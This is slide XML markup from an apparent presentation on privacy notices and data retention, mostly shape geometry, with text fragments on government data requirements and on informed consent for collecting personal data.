                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="236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821942" y="4478273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0" y="457200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0075C4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23872" y="4660391"/>
              <a:ext cx="541019" cy="541020"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2746248" y="5888735"/>
            <a:ext cx="11859895" cy="812800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11859894" h="812800">
                <a:moveTo>
                  <a:pt x="11724386" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135381" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="676909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135381" y="812291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11724386" y="812291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11767190" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11804355" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11833656" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852869" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11859767" y="676909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11859767" y="135381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852869" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11833656" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11804355" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11767190" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11724386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865501" y="6115558"/>
            <a:ext cx="673036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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Government</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>legislative</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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804670" y="5828029"/>
            <a:ext cx="939800" cy="939800"/>
            <a:chOff x="1804670" y="5828029"/>
            <a:chExt cx="939800" cy="939800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1817370" y="5840729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200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="236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817370" y="5840729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0" y="457200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2360" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="2360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="9289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="20557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="35933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="55187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="78090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="104411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="133921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="166390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="201587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="239283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="279249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="321253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="365066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="410458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912039" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905110" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893842" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878466" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859212" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836309" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809988" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780478" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748009" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712812" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675116" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635150" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593146" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549333" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503941" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410458" y="912039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365066" y="905110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321253" y="893842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279249" y="878466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239283" y="859212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201587" y="836309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166390" y="809988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133921" y="780478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104411" y="748009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78090" y="712812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55187" y="675116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35933" y="635150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20557" y="593146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9289" y="549333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360" y="503941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="457200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0075C4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04060" y="6022847"/>
              <a:ext cx="539495" cy="5394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75352" y="306451"/>
            <a:ext cx="630364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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notices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175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Retention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2671" y="760476"/>
            <a:ext cx="8567928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981326" y="1882292"/>
            <a:ext cx="12284075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57879" marR="5080" indent="-3345815">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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owners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should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aware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any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legal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regulatory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issues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may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arise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as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result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collection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processing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personal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data.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0160" y="5791200"/>
            <a:ext cx="13696315" cy="1866900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13696315" h="1866900">
                <a:moveTo>
                  <a:pt x="13385038" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="311150" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265173" y="3373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221290" y="13174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179982" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141731" y="50131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107017" y="76324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76324" y="107017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50131" y="141731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28921" y="179982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13174" y="221290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3373" y="265173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="311150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3373" y="1601726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13174" y="1645609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28921" y="1686917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50131" y="1725168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76324" y="1759882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107017" y="1790575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141731" y="1816768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179982" y="1837978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221290" y="1853725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265173" y="1863526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311150" y="1866900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13385038" y="1866900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13431014" y="1863526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474897" y="1853725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13516205" y="1837978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13554456" y="1816768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13589170" y="1790575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619863" y="1759882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13646056" y="1725168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13667266" y="1686917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13683013" y="1645609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692814" y="1601726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13696188" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13696188" y="311150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692814" y="265173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13683013" y="221290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13667266" y="179982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13646056" y="141731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619863" y="107017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13589170" y="76324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13554456" y="50131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13516205" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474897" y="13174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13431014" y="3373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13385038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621663" y="6290589"/>
            <a:ext cx="13057505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30250" marR="5080" indent="-718185">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Personal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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be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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>collected,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>processed,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF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retained</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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without</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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individual's 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informed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>consent, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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mandated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>regulations,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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EU's</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
